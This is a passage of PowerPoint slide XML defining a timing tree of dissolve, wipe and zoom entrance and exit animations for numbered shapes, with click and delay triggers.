                                        <p:cTn id="51" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1057"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1057"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="53" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1048"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="104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Class="exit" nodeType="clickEffect" presetID="9" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1071"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1071"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1068"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1068"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="66" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1066"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="72" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1083"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1083"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="74" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="75" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="76" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="14" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1080"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1080"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="79" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="15" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1114"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1114"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="84" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="85" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="16" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="86" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="88" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="89" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="17" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="90" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="92" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="93" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1117"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="96" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="97" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="98" presetClass="entr" nodeType="clickEffect" presetSubtype="16" presetID="23" grpId="19" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="99" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="102" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="103" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="20" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="104" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1110"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1110"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="21" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1094"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="109" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1094"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="110" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="111" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="22" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1091"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1091"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="114" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="115" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="23" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1089"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="117" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1089"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="118" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="119" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="24" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1106"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="122" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="123" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="124" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="25" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="125" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1103"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1103"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="127" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="128" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="129" presetClass="exit" nodeType="clickEffect" presetSubtype="32" presetID="23" grpId="26" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="132" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="133" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="134" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="27" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="135" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="138" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="139" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="140" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="28" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
